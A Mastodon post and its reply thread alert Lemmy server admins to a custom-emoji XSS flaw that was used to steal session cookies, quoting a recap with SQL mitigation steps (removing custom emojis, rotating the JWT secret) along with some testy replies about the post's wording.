wake.st is one of the many independent Mastodon servers you can use to participate in the fediverse.
the personal instance of Liaizon Wakest

Administered by:

Server stats:

1
active users

wakest ⁂

ATTENTION LEMMY ADMINS: XSS VULNERABILITY NEEDS PATCHING

Details:
lemmy.world/post/1293336

Lemmy.world was hacked and most Lemmy servers are still vulnerable to the exploit:
lemmy.world/post/1290412

[posted also to @fediverse]

lemmy.worldRecap of the Lemmy XSS incident & steps for mitigation - LemmyWorldThis post is intended as a central place that admins can reference regarding the XSS incident from this morning. ### What happened? A couple of the bigger Lemmy instances had several user accounts compromised through stolen authentication cookies. Some of these cookies belonged to admins, these admin cookies were used to deface instances. Only users that opened pages with malicious content during the incident were vulnerable. The malicious content was possible due to a bug with rendering custom emojis. Stolen cookies gave attackers access to all private messages and e-mail addresses of affected users. ### Am I vulnerable? If your instance has ANY custom emojis, you are vulnerable. Note that it appears only local custom emojis are affected, so federated content with custom emojis from other instances should be safe. ### I had custom emojis on my instance, what should I do? This should be enough to mitigate now: 1. Remove custom emoji DELETE FROM custom_emoji_keyword; DELETE FROM custom_emoji; 2. Rotate your JWT secret (invalidates all current login sessions) -- back up your secret first, just in case SELECT * FROM secret; -- generate a new secret UPDATE secret SET jwt_secret = gen_random_uuid(); 3. Restart Lemmy server If you need help with any of this, you can reach out to me on Matrix (@sunaurus:matrix.org) or on Discord (@sunaurus) ### Legal If your instance was affected, you may have some legal obligations. Please check this comment for more info: https://lemmy.world/comment/1064402 [https://lemmy.world/comment/1064402] ##### More context: https://github.com/LemmyNet/lemmy-ui/issues/1895 [https://github.com/LemmyNet/lemmy-ui/issues/1895] https://github.com/LemmyNet/lemmy-ui/pull/1897 [https://github.com/LemmyNet/lemmy-ui/pull/1897]

This would be more relevant in !lemmy@lemmy.ml, although there’s already a post about it there.

@mondoman712 lemmy is part of the fediverse so it is relevant

cross-post it to !lemmy_support@lemmy.ml too.

You do it. It’s your post.

@randoom You do it. It's your desire.

You do it. You should have posted it there.

I wasn’t being disrespectful. And thank you, it’s always fun to argue with a total stranger.

@liaizon is just not a very kind or reasonable person. It’s not you, it’s them.

Should really have “If you added custom emojis” somewhere ;)

@cwagner oh no some admin who didn't add custom emojos might get alerted that their is a bad bug and not have anything to do!

Sorry for suggesting how your post can become more informative, I’ll make sure to avoid doing such things in the future.

OP was unnecessarily rude to you. I’m waiting for my mod ban for calling them out. This place can’t be that different than reddit.

It is generally a good practice to be specific when describing vulnerabilities. Further, people tend to just read headlines and we know this. You don’t need to be a snarky jerk when someone points that out. Heaven forbid people learn something, sheesh.

@MaybeItWorks I responded snarky and I agree that isn't helpful either. it was the third reply I had gotten criticizing this post which set me off a bit. Maybe the people responding were just trying to be helpful but so was I so we I guess we all need to take a look at our own responses mechanisms

Waiting on patches to propagate to the container registries.

Yeah, thank you! Only had to sacrifice our custom emojis for now :)

@liaizon @fediverse I only joined a few days ago. I suppose this means I have to alter my password?

The attack shouldn’t have exposed passwords or hashes, only the JWT cookie. The secret on the server has been changed so all old cookies should no longer work.

There is a very small possibility that email address may have been able to be seen if they logged is as you, but they were looking for admin accounts

Anyone knows what maintainers should do to patch the vulnerability?

Been patched already in release 0.18.2-rc’s